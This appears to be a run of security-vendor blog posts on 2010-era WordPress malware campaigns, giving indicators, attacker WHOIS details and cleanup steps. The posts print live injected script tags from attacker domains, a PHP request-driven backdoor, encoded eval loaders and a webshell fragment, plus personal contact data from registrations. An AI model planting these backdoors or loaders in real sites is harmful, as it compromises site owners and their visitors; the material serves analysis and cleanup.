http://aeaaea.com/ou

http://secree.com/re

http://uoauer.com/si

http://oeooea.com/ve

http://secowo.com/wo

Those were used in the first batch of attacks that happened a few weeks (months) ago:

http://ae.awaue.com

http://ie.eracou.com

http://ao.euuaw.com

Details about the malware:
http://sucuri.net/malware/entry/MW:RKS:3

For hosting providers/security companies: Block the IP address 91.188.59.203 – (it is hosting all those sites).

Whois details:

Name: Alex Bodrov
Address: Polubotka 19-10
City: Chernigov
Province/state: Chernigov region
Country: UA
Postal Code: 34586
Phone: +48.7139123463
Fax: +48.7139123463
Email: alexbodrovqw@gmail.com

Name: Alexandr Borisenko
Address: Polubotka 81-38
City: kiev
Province/state: Kiev region
Country: UA
Postal Code: 45675
Email: 3807345466632@gmail.com

We will post more details as we learn them.

If your site is hacked and you need help, visit http://sucuri.net to learn about our malware removal and monitoring plans.

< script src = "http://sippa.dottasink.net/music/indi.php”></script>

This redirects any visitor of the hacked site to http:// www3.pc-cleaner40. co.cc, where the famous “fake AV” virus will be offered to him.

And guess who registered that domain?

$ whois dottasink.net
..
Registrant Contact:
HardSoft, inc
Hilary Kneber hilarykneber@yahoo.com
7569468 fax: 7569468
29/2 Sun street. Montey 29
Virginia NA 3947
us

Administrative Contact:
Hilary Kneber hilarykneber@yahoo.com
7569468 fax: 7569468
29/2 Sun street. Montey 29
Virginia NA 3947
us

Yes, the same group behind “vancouvererrorsonfile, whereisdudescars and various other attacks (losotrana.com, zettapetta.com, etc).

Note that this domain is not currently blacklisted (and the site is up), so be careful when clicking those links. So far, we are seeing this spread through all sorts of shared servers, but it seems to be too early to tell how many sites are affected.

If your site is hacked, this script should clean it up: wordpress-fix.php or contact us for a professional, hands on clean-up (support@sucuri.net).

And when this site went down, guess what is showing up on Google:


Yes, that’s around 202k different pages that have been hacked and are showing up those results. When the Google-traffic-analytics.com was up, instead of that error it would spill SPAM to search engines (5 mg tadalafil, viagra, etc).

Just some of the affected sites:

www.archaeological.org (Archaeological Institute of America)
www.energycenter.org (Center for sustainable Energy)
www.ieta.org (International Emissions trading association)
www.efpa-italia.org (European Financial planning association)
www.memes.org
www.ancbs.org
www.grains.org
summits.aberdeen.com
www.scbar.org
www.stpsb.org
teamfocususa.org
www.npg.org.uk
www.brooklynwaldorf.org
www.pcs.org
www.nyew.org
www.vrwa.org
www.ior-institute.org
summits.aberdeen.com
www.greenway.org
www.oldlife.org

Finding them on Google is pretty simple as well: inurl:.org ” 5mg tadalafil” or you can also search for: “http://www.google-traffic-analytics.com” “Warning: file_get_contents” which is what happens when you try to access a hacked site and the google-traffic-analytics site is offline.

As far as cleaning up an affected site, it looks like the attackers added a base64 encoded eval inside the index.php file to load http://www.google-traffic-analytics.com and present the SPAM if the request came from a search engine. Cleaning that up should be enough to remove the spam/error itself, but you still have to find the root cause that allowed your site to get hacked.

We will post more details when we have them.

Need help with a hacked site? Check out http://sucuri.net for a complete malware removal and site monitoring solution.

It seems that today Spamhaus (a widely used Spam blacklist) started to blacklist the IP addresses used by gmail. We got this notification via our blacklist monitor:

< OK: Host www.gmail.com clean.
—
> WARN: http://www.spamhaus.org/query/bl?ip=74.125.227.21
> WARN: Host www.gmail.com blacklisted.

Digging further:

$ host gmail.com
gmail.com has address 74.125.227.24
gmail.com has address 74.125.227.21
gmail.com has address 74.125.227.22
gmail.com has address 74.125.227.23

Querying Spamhaus, we find:

74.125.227.21 is listed in the SBL, in the following records:
74.125.227.22 is listed in the SBL, in the following records:
74.125.227.23 is listed in the SBL, in the following records:
74.125.227.24 is listed in the SBL, in the following records:

Here is the probable reason they were blocked:

Spam Operation: Canadian Pharmacy
74.125.227.0/24 is listed on the SBL as being assigned to, being under the control of, or being otherwise connected with a known spam operation listed on the ROKSO database as: Canadian Pharmacy

Looking for more details, it seems that spammers were using docs.google.com to post some documents, which are stored in the same /24 as gmail. Spamhaus decided to blacklist the whole subnet. Details:

writely.l.google.com
Address: 74.125.227.1 – 74.125.227.15

Please stop supporting spammers.

You can start by removing the following.

————————————

http://docs.google.com/document/edit?id=1-ZumxEpeOxw2kcoZZUtuF_8pu0lQl5xkS8aV_dRN00c

http://docs.google.com/document/edit?id=10S8bRb38l1Ew8d_KVH3b2O46PPhRXYp4uv3gyNJICQs

http://docs.google.com/document/edit?id=10zmjlIiu_b-gzxBipgl8R2asyLYLLkj0OnzhEFALcW0

Details can be verified here: http://www.spamhaus.org/query/bl?ip=74.125.227.21 and here.

Check out Sucuri Security for a professional blacklist, Whois and malware monitoring solution.

Understanding and cleaning the pharma hack on WordPress

One thing we’ve noticed on all sites affected so far is that all of them have been receiving commands from this IP address: 94.76.241.4 (curingin.com).

If your site has been affected you can double check your access.log for these entries:

94.76.241.4 – - [31/Jul/2010:06:07:59 -0700] “POST /wp-content/themes/classic/sidebar.php HTTP/1.1″ 500 374 “-” “-”
94.76.241.4 – - [31/Jul/2010:06:08:30 -0700] “POST /wp-content/themes/classic/sidebar.php HTTP/1.1″ 500 447 “-” “-”
94.76.241.4 – - [31/Jul/2010:11:06:55 -0700] “POST /wp-content/themes/classic/sidebar.php HTTP/1.1″ 500 444 “-” “-”
94.76.241.4 – - [30/Jul/2010:12:57:41 -0700] “POST /wp-content/themes/classic/comments.php HTTP/1.1″ 200 202 “-” “-”

This IP is hosted at Blueconnex and even after tons of abuse reports (from multiple sources), the’ve sat idle.

$ whois 94.76.241.4
route: 94.76.192.0/18
descr: Blueconnex Networks Ltd
origin: AS29550

$ whois curingin.com
Registrant:
Icarus Kann Team
Icarus Kann (ikaruskann@ymail.com)
Potokaki
Elounda
Samos,81300
GR
Tel. +210.9882728

Requests from the IP address try to access a backdoor they’ve inserted inside the /themes directory (generally sidebar.php, comments.php, 404.php, etc). This is what the backdoor looks like (all in one line):

< ?php $a = ‘m’.'d5′;
if($a($_REQUEST[$a])==’698357e86842′.’1222bcf89349bd5cf34d’)
{$w = ‘Cdbl0sYoWOiyJt3qtqyOoqxA’;$x = $_REQUEST[$w];
$y = ‘base’.’6′;$y.= ’4_d’.'ecode’;$x = $y($x);$z = ‘creat’.'e_f’;
$z.= ‘unction’;$x = $z(”,$x);$x();} ?>

If your site is hacked and it keeps getting reinfected, look for this backdoor.

Once that file is called, it re-uploads another script into the /plugins directory and inserts new entries in the DB. Our friend W. Andrew Loe III did a good analysis of this attack and found how it works in detail (he was able to decode all the files in his honeypot).

That’s the first file the attackers uploaded to hack everything:
http://sucuri.net/?page=tools&title=blacklist&detail=7b1341a148b1d8a205587218f66ef912

You see that it reads wp-config.php, creates a new plugin and activates it. This is the file added to the plugins:
http://sucuri.net/?page=tools&title=blacklist&detail=a9663c48164df1fcc59253aed5a0defc

This one is executed as well:
http://sucuri.net/?page=tools&title=blacklist&detail=eb5db5a81632a089fd07fa259c0448a6

So a very interesting and complex attack they’ve managed to pull off. Many sites are still infected, so they probably have a large number of sites under their control.

If your site is infected and you need help, contact us. We’ll get your site cleaned up and malware-free right away.

Protect your interwebs!

The new one that started to spread today uses a javascript file pointing to http://vancouvererrorsonfile.com/js2.php. When called, it will load www4.meowmeow4.co.cc and then offer the famous “fake AV” virus to the end user of a site. That’s how it looks like in a site:

< script src =" http://vancouvererrorsonfile.com/js2.php

Or in our scanner (blueh2):

Note that this domain is not currently blacklisted (and the site is up), so be careful when clicking those links. So far, we are seeing this spread only on Bluehost and Dreamhost, but it seems to be too early to tell how many sites are affected.

If your site is hacked, this script should clean it up: virus-fix.php or contact us for a professional help (support@sucuri.net).

However, what is interesting is the people behind this attack (and all others). Those domains are always registered by:

Hilary Kneber hilarykneber@yahoo.com
7569468 fax: 7569468
29/2 Sun street. Montey 29
Virginia NA 3947
us

You can check all the big ones that affected a large number of sites:

whereisdudescars.com
domainameat.cc
cloudisthebestnow.com
losotrana.com
indesignstudioinfo.com
zettapetta.com

All by the same group and all of them using the same tactics. We should start monitoring registrations using this domain and block them automatically.

We will post more details as we learn about it.

This is how an affected site looks like on our scanner:

Plus, all the sites infected receive “orders” (the spam links to display) from two sites: http://wplinksforwork.com and http://hemoviestube.com. Details about it later.

To get started cleaning your site, you first have to make sure WordPress is updated. If it is not, go ahead and update it before doing anything else.

Cleaning up the file system

The first place you have to clean is the file system. On all the sites we’ve cleaned so far, the malware was hidden in three files: header.php, functions.php and a random image file (void.jpg, test.jpg, lol.jpg, etc). All of them are inside your themes directory.

Inside the header.php, they added the following code:

$wp__theme_icon=create_function(”,file_get_contents(‘/path/wp-content/themes/themename/images/void.jpg’));$wp__theme_icon(); ?>

So it basically read the contents of void.jpg (which is not an image in reality, but a heavily encoded php backdoor):

$ZKb9g9=”\x2f\50\x2e\51\50\x2e\x29″;$fF6B=”3YlJXYlR2X1Zmb0NWau9″;
$SH212J0g=’4x1ht1teJO+fIjr8RQGoOWFtXuBDqxzCadjGO9EcjVvq69bPPU14buBtN0d..
NEO6FzZWtSyGGW/FTBs0n/NTHDdcUzlmNU4lK9dkHkXDt/ZRN59cABTSNAtMP16vXW..
GWDBPxfz0Hemun9U1KfDzN+90qDvameU4y+OhbDXgYZxWNC8bsfHoRJ+yvbxy…
… lots and lots more…

Inside the functions.php, at the very bottom, the following code was added to load the siteurlpath option from the database where the spam itself is hidden:

if(!isset($siteurlpath)&& @get_option(‘siteurlpath’)){
$siteurlpath=create_function(”,(get_option(‘siteurlpath’)));
$siteurlpath();
}

So removing these 3 files should clean the file system for this kind of hack.

Cleaning up the database

Run the following query to see if your database is infected:

> select * from wp_options where option_name = ‘siteurlpath’;

If you see a large spill of php code in there, it means the db is infected.

<br /> if (!defined(‘WP_RAND_CUSTOM_CT_KTT’)){<br /> @error_reporting (0);<br /> define(‘WP_RAND_CUSTOM_CT_KTT’,'boom’);<br /> if (function_exists(‘remove_filter’)){<br /> remove_filter(‘pre_user_first_name’,'sanitize_text_field’);<br /> remove_filter(‘pre_user_first_name’,'wp_filter_kses’);<br /> remove_filter(‘pre_user_first_name’,'_wp_specialchars’,30);<br /> remove_filter(‘user_first_name’,'sanitize_text_field’);<br /> remove_filter(‘user_first_name’,'wp_filter_kses’);<br /> remove_filter(‘user_first_name’,'_wp_specialchars’,30);<br /> remove_filter(‘user_first_name’,'wp_kses_data’);<br /> }<br /> $md5_name_cookie_shell=’f731599f55e732de772d9451dbd705a0′;//792797d03dce<br /> 0fb6ce8004a506bb3577<br /> $md5_cookie_shell=’792797d03dce0fb6ce8004a506bb3577′;//f731599f55e732de7<br /> 72d9451dbd705a0<br /> $local_param=false;<br /> ..<br /> if ($local_param){<br /> eval(base64_decode(‘Ci8qTWFnaWMgSW5jbHVkZSBTaGVsbCBieSBNYWcgaWNx<br /> IDg4NDg4OCovCiAgICAgIC8qRnJvbSBSdXNzaWEgV2l0aCBMb3ZlKi8KZXJyb3JfcmVwb3J0aW5nKDAp<br /> OwokZmV3ZXdmd2VmZXdmd2U9dHJ1ZTsKJGl0ZW1zX3Blcl9wYWdlID0gNTA7CmlmKCRmZXdld2Z3ZWZl<br /> d2Z3ZSl7CmNsYXNzIHppcGZpbGUgCnsgCiAg…

This code basically acts as a backdoor for the attackers and print the SPAM to everyone else. This is the beginning of the backdoor (Magic shell):

<br /> /*Magic Include Shell by Mag icq 884888*/<br /> /*From Russia With Love*/<br /> error_reporting(0);<br /> $fewewfwefewfwe=true;<br /> $items_per_page = 50;<br /> if($fewewfwefewfwe){<br /> class zipfile<br /> ..<br />

As far as the spam, it loads them from two sites: http://wplinksforwork.com and http://hemoviestube.com.

a:2:{i:0;s:56:”http://wplinksforwork.com/561327853624756347509328/p.php”;
i:1;s:54:”http://hemoviestube.com/561327853624756347509328/p.php”;}

The code is full of protection to avoid getting detected and acts as a PHP bot to infect other sites. Both sites used to manage the SPAM bots point to the same IP address and we recommend hosting companies to block them:

# host hemoviestube.com
hemoviestube.com has address 95.168.177.94
# host wplinksforwork.com
wplinksforwork.com has address 95.168.177.94

You can see the scale of this attack by searching for these two sites on Google. You will see lots of sites generating errors when they were not able to reach the spam managers.

Warning: file_get_contents(http://wplinksforwork.com/561327853624756347509328/p.php?
[function.file-get-contents]: failed to …..

We will post more details later about this attack, but this should be enough to clean up the affected sites.

If your site is hacked (or contains malware), and you need help, send us an email at support@sucuri.net or visit our site: Sucuri Security Malware Removal. We can get your sites cleaned up right away.

Also, consider checking out our site security monitoring. We will monitor your sites 24×7 and alert you if it ever gets infected with malware, hacked or blacklisted.

Warning: Visiting this site may harm your computer!
The website at www.ufc.com contains elements from the site bin.clearspring.com, which appears to host malware – software that can hurt your computer or otherwise operate without your consent. Just visiting a site that contains malware can infect your computer.

They are getting indirectly blacklisted because they are loading content from bin.clearspring.com (an advertising network), which is currently blacklisted by Google for having malware.

As far as clearspring is concerned, it seems they’ve been hacked and the attacker has added malicious code to load malware from semaniseme.com and wenmo.in. So multiple levels of indirection here to affect UFC.com users.

Anyone else using clearspring should remove their code from their sites until they have this blacklist issue sorted out.

To avoid getting your site blacklisted or with malware, visit http://sucuri.net to learn about our site security monitoring and malware removal solutions.

The VBSEO team was quick to react and sent the following note to their clients a little while ago:

Hello valued vBSEO customer,

It has come to our attention that a vulnerability on vBulletin 3.8.6
has been discovered. The exploit allows a malicious user to retrieve a
forum’s database credentials via the faq.php script.

If you are running vBulletin 3.8.6, we strongly recommend that you
remove the faq.php script and change your mysql database details as a
precaution.

You can find faq.php in your vBulletin installation directory:
*/vbroot/faq.php

Update: Patch available here.

It seems that a patch is coming very soon too. Some discussion about this issue here. Thanks to Marcus Maciel for the heads up.

We’re tracking another series of attacks affecting many web sites (WordPress seems to be the target application so far). This time they’re using whereisdudescars.com as the attacking site and adding the following javascript to the web sites:

<script src=" http://whereisdudescars.com/js2.php"></script>

<script src=" http://nowisisdudescars.com/js.php

This code then loads another javascript from http://www4.realprotection36.co.cc attempting to push the “Fake Anti virus” virus to the visitor of the site.

What is interesting is the people behind this attack. Do you remember the losotrana attack amongst the various others we’ve discussed in the past few months? Well, the people involved in this one are the same. Check out the WHOIS contact info for whereisdudescars.com:

Domain name: whereisdudescars.com

Registrant Contact:
HardSoft, inc
Hilary Kneber hilarykneber@yahoo.com
7569468 fax: 7569468
29/2 Sun street. Montey 29
Virginia NA 3947
us

It’s the same hilarykneber@yahoo.com that registered losotrana.com, holasionweb.com and others. We’re still researching the exploit vector, and we’ll post more details when we have them.

If you’re having difficulties getting your site cleaned up, send us an email to contact@sucuri.net or visit our site: sucuri.net. We can get your sites clean up right away.